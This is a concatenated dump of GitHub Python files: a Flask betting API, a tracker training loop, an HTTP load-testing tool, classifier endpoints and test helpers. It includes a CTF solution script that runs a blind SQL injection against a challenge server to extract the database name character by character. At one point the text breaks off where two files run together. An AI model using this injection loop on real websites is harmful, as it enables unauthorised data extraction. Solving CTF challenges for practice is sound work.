\"http://localhost:5000/horses/\"+horseName\r\n print(getSql)\r\n response = requests.get(getSql)\r\n print(response)\r\n json_data = response.json()\r\n horse_data = json_data[\"data\"]\r\n print(json_data)\r\n sqlstring = getSql\r\n endpoint_info=json_data\r\n querying=\"full\"\r\n # -------------------setting config header-----------------------#\r\n config[\"configheader\"][\"flag\"] = \"True\"\r\n with open('configheader.properties', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n if config[\"configheader\"][\"flag\"] == \"True\" or config[\"configheader\"][\"flag\"] == True:\r\n print(\"config is true\")\r\n else:\r\n print(\"config is still false\")\r\n\r\n if \"HorseId\" in request.form:\r\n print(request.form[\"HorseId\"])\r\n if config[\"configheader\"][\"flag\"] == \"True\" or config[\"configheader\"][\"flag\"] == True:\r\n\r\n HorseId = 
request.form[\"HorseId\"]\r\n HorseId = int(HorseId)\r\n if \"account\" in request.form:\r\n print(request.form[\"account\"])\r\n account = request.form[\"account\"]\r\n account = float(account)\r\n sqlstring=\"http://localhost:5000/horselist\"\r\n response2 = requests.get(sqlstring)\r\n\r\n all_horses = response2.json()[\"data\"]\r\n\r\n listall = list(all_horses[\"HorseID\"].values())\r\n\r\n if HorseId in listall:\r\n\r\n inde = list(all_horses[\"HorseID\"].keys())[list(all_horses[\"HorseID\"].values()).index(HorseId)]\r\n\r\n horse_data = {'id': all_horses[\"HorseID\"][inde], 'name': all_horses[\"name\"][inde], 'Price': all_horses[\"Price\"][inde],\r\n 'Age': all_horses[\"Age\"][inde], 'Height': all_horses[\"Height\"][inde], 'Sex': all_horses[\"Sex\"][inde]}\r\n\r\n if account>= float(horse_data['Price']):\r\n endpoint_info={\"message\":\"Successfully placed a bet on the horse\",\"data\":horse_data}\r\n else:\r\n endpoint_info = {\"message\": \"OOPS!!! Insufficient funds, check the price for the horse and try again\", \"data\": {}}\r\n else:\r\n horse_data=\"{}\"\r\n endpoint_info={\"message\":\"no horse found\",\"data\":{}}\r\n\r\n config[\"configheader\"][\"flag\"] = \"False\"\r\n with open('configheader.properties', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n else:\r\n warning=\"{\\\"message\\\":FATAL ERROR! Please send a query in 1. before placing a bet here,\\\"data\\\":{}}\"\r\n\r\n\r\n else:\r\n # redirect(request.url)\r\n return render_template('index.html', ISO=\"\")\r\n return render_template('index.html', sql_string=sqlstring, horse_data=horse_data, endpoint_info=endpoint_info,querying=querying, warning=warning)\r\n\r\n\r\n# class HorseList(Resource):\r\n\r\n\r\nclass Horse(Resource):\r\n def get(self):\r\n data = pd.read_csv('HorsePricesREST.csv')\r\n data = data.to_dict()\r\n return {\"message\":\"success\",\"data\":data},200\r\n\r\n def get(self, name):\r\n\r\n try:\r\n data = pd.read_csv('HorsePricesREST.csv')\r\n data = data.to_dict()\r\n inde = list(data[\"name\"].keys())[list(data[\"name\"].values()).index(name)]\r\n # print(inde)\r\n obj = {'id': data[\"HorseID\"][inde], 'name': data[\"name\"][inde], 'Price': data[\"Price\"][inde],\r\n 'Age': data[\"Age\"][inde], 'Height': data[\"Height\"][inde], 'Sex': data[\"Sex\"][inde]}\r\n # print(obj)\r\n if not obj:\r\n return {'message': \"no horse found\", \"data\": {}}, 404\r\n else:\r\n return {'message': \"success\", \"data\": obj}, 200\r\n\r\n except Exception as e:\r\n return {'message':\"no horse found\",\"data\":{}},404\r\n\r\n\r\nclass User(Resource):\r\n pass\r\n\r\nclass horseList(Resource):\r\n def get(self):\r\n data = pd.read_csv('HorsePricesREST.csv')\r\n data = data.to_dict()\r\n return {\"message\":\"success\",\"data\":data},200\r\n\r\napi.add_resource(User, '/users')\r\n\r\napi.add_resource(Horse, '/horses/<string:name>')\r\n\r\napi.add_resource(horseList, '/horselist')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, threaded=True)\r\n\r\n","repo_name":"delzadbamji/horseRacing-restAPI-Flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72006352090","text":"import torch\nimport math\nimport numpy as np\nimport os\nimport io\nimport copy\nimport ctypes\nimport random\nfrom . 
import basic\n\nclass NN_policy(object):\n def __init__(self,actor,epsilon):\n self.actor = copy.deepcopy(actor) \n self.epsilon = epsilon \n def inference(self,obs_list):\n with torch.no_grad():\n pos = torch.Tensor(np.vstack([obs.pos for obs in obs_list])).cuda()\n laser_data = torch.Tensor(np.vstack([obs.laser_data for obs in obs_list])).cuda()\n \n action = self.actor(pos,laser_data).cpu().numpy()\n if random.random() int:\n need = sum(nums)%p\n if need ==0:\n return 0\n print(need,\"dfscdscsd\")\n n=len(nums)\n res=n\n dic=defaultdict(int)\n dic[0]=-1\n cur= 0\n for i in range(n):\n cur=(cur+nums[i])%p\n \n if (cur-need)%p in dic:\n res = min(res,i-dic[(cur-need)%p])\n dic[cur]=i\n\n return res if res args.max_iter:\n logger.info('Max iteration exceeds')\n break\n\n if len(np.where(is_good == 0)[0]) == 0:\n\n # two pass training\n if count == args.max_pass:\n break\n else:\n count += 1\n logger.info('***pass {} finished'.format(count))\n # todo change shape from (num_train) to (num_train, 1)\n is_good = np.zeros((num_train, 1))\n is_good[is_difficult == 1] = 1\n counter = np.zeros((num_train, 1))\n t = -1\n # find a sequence to train\n while True:\n t = t + 1\n if t >= num_train:\n t = 0\n if is_good[t] == 0:\n break\n\n if args.is_text:\n logger.info('Tracking sequence {}'.format(t))\n\n dres_gt = dres_train[t]\n\n # first frame\n fr = dres_gt['fr'][0]\n identity = dres_gt['id'][0]\n\n # reset tracker : Transfer the MDP to Tracked.\n tracker.prev_state = 1\n tracker.state = 1\n tracker.target_id = identity\n\n # For LSTM tracker\n tracker.prev_frames = []\n tracker.prev_det_id = []\n\n # start tracking\n while fr <= seq_num:\n if args.is_text:\n logger.info('frame {}, state {}'.format(fr, tracker.state))\n\n # extract detection\n # todo doubt\n index = np.where(dres_det['fr'] == fr)[0]\n dres = sub(dres_det, index)\n num_det = len(dres['fr'])\n\n # inactive\n if tracker.state == 0:\n if reward == 1:\n is_good[t] = 1\n logger.info('sequence {} is good'.format(t))\n break\n\n # active\n elif tracker.state == 1:\n\n # compute overlap\n overlap, _, _ = calc_overlap(dres_gt, 0, dres, np.arange(num_det))\n ind = np.argmax(overlap)\n ov = overlap[ind]\n if args.is_text:\n logger.info('Start first frame overlap {:.2}'.format(ov))\n\n # initialize the LK tracker : Initial the target template\n tracker = lk_initialize(tracker, fr, identity, dres, ind, dres_image)\n tracker.state = 2\n tracker.streak_occluded = 0\n\n # build the dres structure\n dres_one = sub(dres, ind)\n tracker.dres = dres_one\n tracker.dres['id'] = np.array([tracker.target_id])\n tracker.dres['state'] = np.array([tracker.state])\n\n if tracker.is_lstm == 1:\n tracker = add_to_target_queue(tracker, dres_one['fr'], dres_one['id'], args.is_text)\n\n # tracker\n elif tracker.state == 2:\n tracker.streak_occluded = 0\n # todo verify mdp_value\n tracker, _, _ = mdp_value(tracker, fr, dres_image, dres, [], args)\n\n # occluded\n elif tracker.state == 3:\n tracker.streak_occluded = tracker.streak_occluded + 1\n\n # find a set of detections for association\n dres = mdp_crop_image_box(dres, dres_image['Igray'][fr - 1], tracker)\n dres, index_det, ctrack = generate_association_index(tracker, fr, dres)\n index_gt = np.where(dres_gt['fr'] == fr)[0]\n if dres_gt['covered'][index_gt] != 0:\n index_det = []\n tracker, _, f = mdp_value(tracker, fr, dres_image, dres, index_det, args)\n\n if not isempty(index_det):\n # compute reward\n reward, label, f, is_end = mdp_reward_occluded(fr, f, dres_image, dres_gt, dres, index_det, tracker,\n args, 
args.is_text, logger)\n\n # update weights if negative reward\n if reward == -1:\n tracker.f_occluded = np.vstack((tracker.f_occluded, f))\n tracker.l_occluded = np.append(tracker.l_occluded, label)\n # todo what is happening\n if args.is_sk_svm:\n tracker.svc_occluded = tracker.svc_occluded.fit(tracker.f_occluded, tracker.l_occluded)\n else:\n tracker.w_occluded = svm_train(tracker.l_occluded.tolist(), tracker.f_occluded.tolist(),\n '-c 1 -q -g 1 -b 1')\n logger.info('training examples in occluded state {}'.format(tracker.f_occluded.shape[0]))\n if is_end:\n tracker.state = 0\n\n # Transition to inactive if lost for a long time\n if tracker.streak_occluded > args.max_occlusion:\n tracker.state = 0\n if len(np.where(dres_gt['fr'] == fr)[0]) == 0:\n reward = 1\n logger.info('Target exits due to long time occlusion')\n\n # check if outside image\n if tracker.state == 2:\n _, ov, _ = calc_overlap(tracker.dres, tracker.dres['fr'].shape[0] - 1, dres_image, fr - 1)\n if ov < args.exit_threshold:\n logger.info('Target outside image by checking borders')\n tracker.state = 0\n reward = 1\n\n # try to connect recently lost target\n if not (tracker.state == 3 and tracker.prev_state == 2):\n fr = fr + 1\n\n if fr > seq_num:\n is_good[t] = 1\n logger.info('sequence {} is good'.format(t))\n counter[t] = counter[t] + 1\n if counter[t] > max_count:\n is_good[t] = 1\n is_difficult[t] = 1\n logger.info('sequence {} max iteration'.format(t))\n logger.info('Finish training {}'.format(seq_name))\n\n # save model\n if args.is_save:\n # save SVM\n filename = os.path.join(args.output_dir, args.name, seq_name + '_w_active')\n svm_save_model(filename, tracker.w_active)\n filename = os.path.join(args.output_dir, args.name, seq_name + '_w_occluded')\n svm_save_model(filename, tracker.w_occluded)\n w_active = tracker.w_active\n w_occluded = tracker.w_occluded\n tracker.w_active = None\n tracker.w_occluded = None\n\n filename = os.path.join(args.output_dir, args.name, seq_name + '_tracker.pkl')\n logger.info('Saving the tracker at {}'.format(filename))\n with open(filename, 'wb') as f:\n pickle.dump(tracker, f)\n tracker.w_active = w_active\n tracker.w_occluded = w_occluded\n\n return tracker\n\n\n# if __name__ == '__main__':\n# # Parse cmdline args and setup environment\n# parser = argparse.ArgumentParser(\n# 'Appearance Model',\n# formatter_class=argparse.ArgumentDefaultsHelpFormatter\n# )\n# config.add_args(parser)\n# args = parser.parse_args()\n# mdp_train()\n","repo_name":"TapanBhardwaj/MDP_Python","sub_path":"mdp_function/mdp_train.py","file_name":"mdp_train.py","file_ext":"py","file_size_in_byte":8995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9389155077","text":"import asyncio\nimport copy\nimport json\nimport os\nimport statistics\nimport time\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nimport httpx\nimport toml\nimport typer\nfrom httpx._exceptions import ConnectTimeout, HTTPError, NetworkError, ReadTimeout\nfrom jinja2 import Template\nfrom tabulate import tabulate\n\nHTTP_METHODS_FUNC_MAPPING = {\n \"GET\": \"make_get_request\",\n \"POST\": \"make_post_request\",\n \"PUT\": \"make_put_request\",\n \"PATCH\": \"make_patch_request\",\n \"DELETE\": \"make_delete_request\",\n}\n\nSUCCESS = typer.style(\"success\", fg=typer.colors.GREEN, bold=True)\nERROR = typer.style(\"error\", fg=typer.colors.RED, bold=True)\nFLOW_ERROR = typer.style(\"FLOW_ERROR\", bg=typer.colors.RED, fg=typer.colors.WHITE, bold=True)\nREQUEST_INFO = 
typer.style(\"REQUEST_INFO\", bg=typer.colors.GREEN, fg=typer.colors.BLACK, bold=True)\n\nREQUEST_MESSAGE = \"Request {}: name={}, url={}\"\nSTART_MESSAGE = \"Start bloodaxe, number_of_concurrent_flows={}, duration={} seconds\"\nRESPONSE_DATA_CHECK_FAILED_MESSAGE = \"Failed to check response, request={}, \" \"expected data={}, received={}\"\nRESPONSE_STATUS_CODE_CHECK_FAILED_MESSAGE = (\n \"Status code check failed, request={}, \" \"expected status_code={}, received={}\"\n)\nSECONDS_MASK = \"{0:.2f}\"\nDEFAULT_TIMEOUT = 10\n\nTABLE_HEADERS = [\n \"Total success flows\",\n \"Total error flows\",\n \"Total flows\",\n \"Mean time\",\n \"Standard deviation\",\n \"Total time\",\n]\n\nHTTP_EXCEPTIONS = (HTTPError, NetworkError, ReadTimeout, ConnectTimeout)\n\napp = typer.Typer()\n\n\nclass FlowError(Exception):\n pass\n\n\n@dataclass\nclass Flow:\n duration: float = 0\n error: FlowError = None\n success: bool = True\n\n\ndef show_request_message(status, name, url):\n message = REQUEST_MESSAGE.format(status, name, url)\n typer.echo(message)\n\n\ndef replace_with_template(context, data):\n if isinstance(data, dict):\n data = json.dumps(data)\n\n template = Template(data)\n\n return template.render(**context)\n\n\nasync def make_get_request(url, timeout, params=None, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.get(url, params=params, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_get_request, exc={exc}\")\n\n return resp\n\n\nasync def make_delete_request(url, timeout, params=None, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.delete(url, params=params, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_delete_request, exc={exc}\")\n\n return resp\n\n\nasync def make_put_request(url, data, timeout, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.put(url, json=data, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_put_request, exc={exc}\")\n\n return resp\n\n\nasync def make_patch_request(url, data, timeout, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.patch(url, json=data, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_patch_request, exc={exc}\")\n\n return resp\n\n\nasync def make_post_request(url, data, timeout, headers=None, *args, **kwargs):\n try:\n async with httpx.AsyncClient() as client:\n resp = await client.post(url, json=data, timeout=timeout, headers=headers)\n resp.raise_for_status()\n except HTTP_EXCEPTIONS as exc:\n raise FlowError(f\"An error occurred when make_post_request, exc={exc}\")\n\n return resp\n\n\ndef check_response_data(request_name, data, expected_data, context):\n expected_data = json.loads(replace_with_template(context, expected_data))\n error_msg = RESPONSE_DATA_CHECK_FAILED_MESSAGE.format(request_name, expected_data, data)\n\n if data != expected_data:\n raise FlowError(error_msg)\n\n\ndef check_response_status_code(request_name, status_code, expected_status_code):\n error_msg = RESPONSE_STATUS_CODE_CHECK_FAILED_MESSAGE.format(\n request_name, expected_status_code, 
status_code\n )\n\n if status_code != expected_status_code:\n raise FlowError(error_msg)\n\n\ndef check_response(request_name, data, status_code, context, response_check=None):\n if response_check.get(\"data\"):\n check_response_data(request_name, data, response_check[\"data\"], context)\n if response_check.get(\"status_code\"):\n check_response_status_code(request_name, status_code, response_check[\"status_code\"])\n\n\nasync def make_request(context, name, url, method, response_check=None, *args, **kwargs):\n method = method.upper()\n try:\n func = eval(HTTP_METHODS_FUNC_MAPPING[method])\n except KeyError:\n raise FlowError(f\"An error occurred when make_request, invalid http method={method}\")\n\n resp = await func(url, *args, **kwargs)\n data = resp.json()\n status_code = resp.status_code\n\n if response_check:\n check_response(name, data, status_code, context, response_check)\n\n return data\n\n\ndef show_metrics(flows, total_time):\n success_flows = [flow for flow in flows if flow.success]\n error_flows = [flow for flow in flows if flow.error]\n mean_time = 0\n standard_deviation = 0\n\n if len(success_flows) > 1:\n mean_time = statistics.mean([flow.duration for flow in success_flows])\n standard_deviation = statistics.stdev([flow.duration for flow in success_flows])\n\n row = [\n len(success_flows),\n len(error_flows),\n len(flows),\n SECONDS_MASK.format(round(mean_time, 2)),\n SECONDS_MASK.format(round(standard_deviation, 2)),\n SECONDS_MASK.format(round(total_time, 2)),\n ]\n\n typer.echo(\"\\n\")\n typer.echo(tabulate([row], headers=TABLE_HEADERS))\n\n\ndef from_file(file_path):\n with open(file_path) as f:\n try:\n data = json.load(f)\n except json.JSONDecodeError:\n raise ValueError(f\"Invalid json file, file={file_path}\")\n\n return data\n\n\ndef generate_request_data(context, data):\n if data.get(\"from_file\"):\n data = from_file(data.get(\"from_file\"))\n\n return json.loads(replace_with_template(context, data))\n\n\ndef generate_request_headers(context, headers):\n return json.loads(replace_with_template(context, headers))\n\n\ndef generate_request_params(context, params):\n return json.loads(replace_with_template(context, params))\n\n\ndef make_api_context(api_info):\n context = {}\n for api in api_info:\n context[api[\"name\"]] = {\"base_url\": api[\"base_url\"]}\n\n env_vars = api.get(\"envvars\", {})\n for key, value in env_vars.items():\n context[api[\"name\"]][key] = os.environ[value]\n\n return context\n\n\nasync def run_flow(toml_data, verbose):\n flow_config = copy.deepcopy(toml_data)\n context = make_api_context(flow_config.get(\"api\")) or {}\n start_flow_time = time.time()\n current_flow = Flow()\n\n for request in flow_config[\"request\"]:\n request[\"timeout\"] = request.get(\"timeout\") or DEFAULT_TIMEOUT\n request[\"url\"] = replace_with_template(context, request[\"url\"])\n\n if request.get(\"data\"):\n request[\"data\"] = generate_request_data(context, request[\"data\"])\n\n if request.get(\"params\"):\n request[\"params\"] = generate_request_params(context, request[\"params\"])\n\n if request.get(\"headers\"):\n request[\"headers\"] = generate_request_headers(context, request[\"headers\"])\n\n try:\n result = await make_request(context, **request)\n show_request_message(SUCCESS, request[\"name\"], request[\"url\"])\n if verbose:\n typer.secho(f\"{REQUEST_INFO}: request_name={request['name']}, response={result}\")\n except FlowError as exc:\n show_request_message(ERROR, request[\"name\"], request[\"url\"])\n current_flow.error = exc\n current_flow.success 
= False\n if verbose:\n typer.secho(f\"{FLOW_ERROR}: {exc}\")\n break\n\n if request.get(\"save_result\"):\n context[request[\"name\"]] = result\n\n current_flow.duration = time.time() - start_flow_time\n\n return current_flow\n\n\nasync def start(toml_data, verbose):\n flows = tuple()\n duration = toml_data[\"configs\"][\"duration\"]\n number_of_concurrent_flows = toml_data[\"configs\"][\"number_of_concurrent_flows\"]\n\n typer.secho(\n START_MESSAGE.format(number_of_concurrent_flows, duration),\n fg=typer.colors.CYAN,\n underline=True,\n bold=True,\n )\n\n start_time = time.time()\n while True:\n elapsed_seconds = time.time() - start_time\n\n if elapsed_seconds >= duration:\n break\n\n results = await asyncio.gather(\n *[run_flow(toml_data, verbose) for _ in range(number_of_concurrent_flows)]\n )\n\n flows += tuple(results)\n\n show_metrics(flows, elapsed_seconds)\n\n\n@app.command()\ndef main(flow_config_file: Path, verbose: bool = False):\n try:\n toml_data = toml.load(flow_config_file)\n except (TypeError, toml.TomlDecodeError):\n typer.echo(\"Invalid toml file\")\n else:\n asyncio.run(start(toml_data, verbose))\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"rfunix/bloodaxe","sub_path":"bloodaxe.py","file_name":"bloodaxe.py","file_ext":"py","file_size_in_byte":9585,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"40613851937","text":"# -*- coding:utf-8 -*-\r\n\r\nimport re\r\nimport random\r\n\r\nfrom utils import testcase_handler\r\n\r\n\r\n# @ResponseDependMulti('A-002','industryNo','data')\r\n# @PayloadDepend('A-001','industryNam')\r\n\r\n\r\ndef ResponseDependMulti(case_no, keyword, dto):\r\n    caseinfo = testcase_handler.get_case_info(case_no=case_no)  # get the full record for the current case_no\r\n    responsebody = eval(str(caseinfo[13]))\r\n    if '#' not in dto:\r\n        for data in responsebody[dto]:\r\n            return data[str(keyword)]\r\n    elif '#' in dto:\r\n        jsonpath = re.split('#', dto)\r\n        print(jsonpath)\r\n        for i in range(len(jsonpath)):\r\n            print(responsebody)\r\n            if type(responsebody) == list:\r\n                responsebody = responsebody[0][jsonpath[i]]\r\n            else:\r\n                responsebody = responsebody[jsonpath[i]]\r\n        # print(responsebody[str(keyword)])\r\n        # print(responsebody)\r\n        if type(responsebody) == list:\r\n            responsebody = responsebody[0][keyword]\r\n            print(responsebody)\r\n            return responsebody\r\n        else:\r\n            return responsebody[keyword]\r\n    else:\r\n        pass\r\n\r\n\r\ndef PayloadDepend(case_no, keyword):\r\n    caseinfo = testcase_handler.get_case_info(case_no=case_no)  # get the full record for the current case_no\r\n    requestbody = eval(str(caseinfo[17]))\r\n    return requestbody[keyword]\r\n\r\n\r\n# @RString('u','10')\r\n# re.search('@(.+?)\\(', str(\"@RString('u','10')\")).group(1)\r\n# print(re.search('@(.+?)\\(', str(\"@RString('u','10')\")).group(1))\r\ndef RString(flag, length):\r\n    u_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZ'\r\n    l_str = 'abcdefghigklmnopqrstuvwxyz'\r\n    m_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz'\r\n    if flag == 'u':\r\n        \"\"\"Get uppercase letters of the specified length\"\"\"\r\n        random_str = ''\r\n        for i in range(int(length)):\r\n            random_str += u_str[random.randint(0, len(u_str) - 1)]\r\n        # print(random_str)\r\n        return random_str\r\n    elif flag == 'l':\r\n        \"\"\"Get lowercase letters of the specified length\"\"\"\r\n        random_str = ''\r\n        for i in range(int(length)):\r\n            random_str += l_str[random.randint(0, len(l_str) - 1)]\r\n        # print(random_str)\r\n        return random_str\r\n    elif flag == 'm':\r\n        \"\"\"Get mixed-case letters of the specified length\"\"\"\r\n        random_str = ''\r\n        for i in range(int(length)):\r\n            random_str += m_str[random.randint(0, len(m_str) - 1)]\r\n        # print(random_str)\r\n        return random_str\r\n\r\n\r\ndef RNum(length):\r\n    randstart = 10 ** (length - 1)\r\n    randend = (10 ** length) 
- 1\n return random.randint(randstart, randend)\n\n\ndef test():\n pass\n","repo_name":"Bikankan/ApiAutomatic-1","sub_path":"utils/keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"75132183130","text":"import requests\n\nurl=\"http://ea48910f-376f-4f65-9b03-20a70766520e.node3.buuoj.cn/index.php\"\n# url=\"http://1a80bd91-ddfa-4db6-bd93-198413227815.node3.buuoj.cn/index.php?stunum=if(ascii(substr(database(),1,1))=55,1,2)\"\npayload=\"if(ascii(substr(database(),{},1))={},1,2)\"\n\n# if(ascii(substr(database(),1,1))=54,1,2)\n# if(ascii(substr(select database(),1,1))=55,1,2)\ncharacters=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_\"\nif __name__ == \"__main__\":\n result=\"\"\n for i in range(1,25):\n for ac in range(33,125):\n params={\n \"stunum\":payload.format(i,ac)\n }\n response=requests.get(url=url,params=params)\n # response=requests.get(url=url)\n # print(response.text)\n if(\"Hi admin\" in response.text):\n result+=chr(ac)\n # print(ac)\n print(result)","repo_name":"lurenxiao1998/CTFOJ","sub_path":"[WUSTCTF2020]颜值成绩查询/payload.py","file_name":"payload.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41883448548","text":"from flask import request, jsonify\nfrom chat.api import api_bp\nimport pickle\nimport re\n\n\nclass TextSpamClassifier():\n def __init__(self) -> None:\n with open('notebooks/spam_filter/model_spam.pickle', 'rb') as handle:\n self.model = pickle.load(handle)\n with open('notebooks/spam_filter/vectorizer_spam.pickle',\n 'rb') as handle:\n self.vectorizer = pickle.load(handle)\n\n def __preprocess_text(self, text):\n text = text.lower()\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text)\n text = text.strip()\n text = text.split()\n text = ' '.join(list(filter(lambda x: x not in ['', ' '], text)))\n return text\n\n def predict_proba(self, X):\n val = self.__preprocess_text(X)\n val = self.vectorizer.transform([val])\n prob = self.model.predict_proba(val)[0][1]\n return prob\n\n\nclass TextProfanityClassifier():\n def __init__(self) -> None:\n with open('notebooks/profanity_filter/model_profanity.pickle',\n 'rb') as handle:\n self.model = pickle.load(handle)\n with open('notebooks/profanity_filter/vectorizer_profanity.pickle',\n 'rb') as handle:\n self.vectorizer = pickle.load(handle)\n\n def __preprocess_text(self, text):\n text = text.lower()\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text)\n text = text.strip()\n text = text.split()\n text = ' '.join(list(filter(lambda x: x not in ['', ' '], text)))\n return text\n\n def predict_proba(self, X):\n val = self.__preprocess_text(X)\n val = self.vectorizer.transform([val])\n prob = self.model.predict(val)[0]\n return prob\n\n\n@api_bp.route('/text-validate', methods=['POST'])\ndef text_chat_validate():\n message = request.form.get('message')\n tsc = TextSpamClassifier()\n tpc = TextProfanityClassifier()\n spam_text = \"Not a spam!\"\n prof_text = \"No profane!\"\n if tpc.predict_proba(message) != 0:\n prof_text = \"Highly profane!\"\n if tsc.predict_proba(message) > 0.8:\n spam_text = \"Highly spam!\"\n elif tsc.predict_proba(message) > 0.6:\n spam_text = \"Slightly spam!\"\n elif tsc.predict_proba(message) > 0.4:\n spam_text = \"Less spam!\"\n elif tsc.predict_proba(message) > 0.2:\n spam_text = \"I don't think spam!\"\n\n prof_prob = tpc.predict_proba(message)\n 
if prof_prob > 0.5:\n prof_text = \"Profane text!\"\n\n return jsonify({\n \"spam_text\": f\"{spam_text}\",\n \"prof_text\": f\"{prof_text}\",\n \"status\": \"success\"\n })\n","repo_name":"indic-amigo-akademi/moraliser","sub_path":"chat/api/chat_route.py","file_name":"chat_route.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4269888887","text":"#!/usr/bin/python\nimport random\ntry:\n from cParameters import *\n from cReadInpLifespan import *\n sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')) + \"\\\\.site_packages\\\\riverpy\\\\\")\n import fGlobal as fGl\n import config\n import cThresholdDirector as cT\n import cDefinitions\nexcept:\n print(\"ExceptionERROR: Cannot find package files (/.site_packages/riverpy/).\")\n\ntry:\n import arcpy\nexcept:\n print(\"ExceptionERROR: arcpy is not available (check license connection?)\")\ntry:\n from arcpy.sa import *\nexcept:\n print(\"ExceptionERROR: Spatial Analyst (arcpy.sa) is not available (check license?)\")\n\n\ndef create_bed_shear(self, condition1):\n self.features = cDefinitions.FeatureDefinitions()\n self.feature_reader = cDefinitions.FeatureReader()\n self.thresh_xlsx = config.xlsx_thresholds\n\n try:\n self.wb = oxl.load_workbook(filename=self.thresh_xlsx, read_only=True, data_only=True)\n wb_open = True\n except:\n wb_open = False\n self.logger.info(\"ERROR: Could not open threshold_values.xlsx.\")\n try:\n if wb_open:\n self.ws = self.wb['thresholds']\n else:\n self.ws = \"\"\n except:\n self.logger.info(\"ERROR: Could not find sheet \\'thresholds\\' in threshold_values.xlsx.\")\n\n self.thresh_row_dict = self.feature_reader.get_rows()\n unit_cell = self.ws.cell(row=self.thresh_row_dict['unit'], column=5).value\n\n print(unit_cell)\n __n__ = 0.0473934\n\n if unit_cell == \"U.S. customary\":\n self.ft2m = config.ft2m\n self.ft2in = 12 # (in/ft) conversion factor for U.S. 
customary units\r\n self.n = __n__ / 1.49 # (s/ft^(1/3)) global Manning's n where k =1.49 converts to US customary\r\n self.n_label = \"s/ft^(1/3)\"\r\n self.rho_w = 1.937 # slug/ft^3\r\n else:\r\n self.ft2m = 1.0\r\n self.ft2in = 1 # (in/ft) dummy conversion factor in SI\r\n self.n = __n__ # (s/m^(1/3)) global Manning's n\r\n self.n_label = \"s/m^(1/3)\"\r\n self.rho_w = 1000 # kg/m^3\r\n\r\n self.g = 9.81 / self.ft2m # (ft/s2) gravity acceleration\r\n self.s = 2.68 # (--) relative grain density (ratio of rho_s and rho_w)\r\n self.sf = 0.99\r\n dir_tb = config.dir2conditions + condition1 + \"\\\\tb\\\\\"\r\n dir_ts = config.dir2conditions + condition1 + \"\\\\ts\\\\\"\r\n\r\n os.mkdir(dir_ts)\r\n os.mkdir(dir_tb)\r\n\r\n h = FlowDepth(condition1)\r\n u = FlowVelocity(condition1)\r\n grains = GrainSizes(condition1)\r\n if str(grains.raster).__len__() > 1:\r\n tx_raster_list = []\r\n for i in range(0, h.raster_names.__len__()):\r\n if (str(u.rasters[i]).__len__() > 1) and (str(h.rasters[i]).__len__() > 1):\r\n _q_ = fGl.read_Q_str(h.raster_names[i], prefix='h')\r\n _name__ = 'tb' + fGl.write_Q_str(_q_) + '.tif'\r\n name__ = 'ts' + fGl.write_Q_str(_q_) + '.tif'\r\n _ras__ = Square(u.rasters[i] / (5.75 * Log10(12.2 * h.rasters[i] / (2 * 2.2 * grains.raster))))\r\n arcpy.CopyRaster_management(_ras__, dir_tb + _name__)\r\n __ras__ = (self.rho_w * _ras__) / (self.rho_w * self.g * (self.s - 1) * grains.raster)\r\n arcpy.CopyRaster_management(__ras__, dir_ts + name__)\r\n tx_raster_list.append(__ras__)\r\n\r\n","repo_name":"RiverArchitect/program","sub_path":"LifespanDesign/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"7808298572","text":"import simPyon as sim\nimport numpy as np\n# To run this file must be in the same folder as \n\ndef main():\n\t# Load up some voltages\n\tvolts = np.load('volts_de_e_1_330_3.npy').item()\n\n\t# Load Simion command environment\n\timap = sim.simion()\n\n\t# manually input voltages\n\timap.define_volts()\n\n\t# Fast Adjust voltages \n\timap.fast_adjust(elec_dict = volts) # if volts was loaded\n\timap.fast_adjust() #if voltages were input manually\n\n\t# Define Line distributions for source\n\tline_1 = [np.array([260,156,0]),np.array([270,106,0])]\n\tline_2 = [np.array([99.4,133,0])+10,np.array([158.9,116.8,0])+10]\n\n\t# Print particle source description\n\tprint(imap.parts())\n\n\t# Change distribution type\n\t# imap.parts.pos = sim.particles.source('gaussian')\n\n\t# Change Distribution inputs\n\timap.parts.pos.dist_vals['first'] = line_1[0]\n\timap.parts.pos.dist_vals['last'] = 